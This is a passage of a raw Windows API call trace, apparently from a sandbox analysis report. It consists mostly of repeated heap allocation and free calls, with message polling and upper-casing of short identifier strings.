(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.901] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0087.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.901] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.902] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.902] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.902] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.902] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.903] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.903] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0087.903] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.903] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.903] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.903] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e80 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cb8 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c40 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0087.906] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74598 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.906] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.906] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0087.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0087.907] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0087.907] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.907] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, 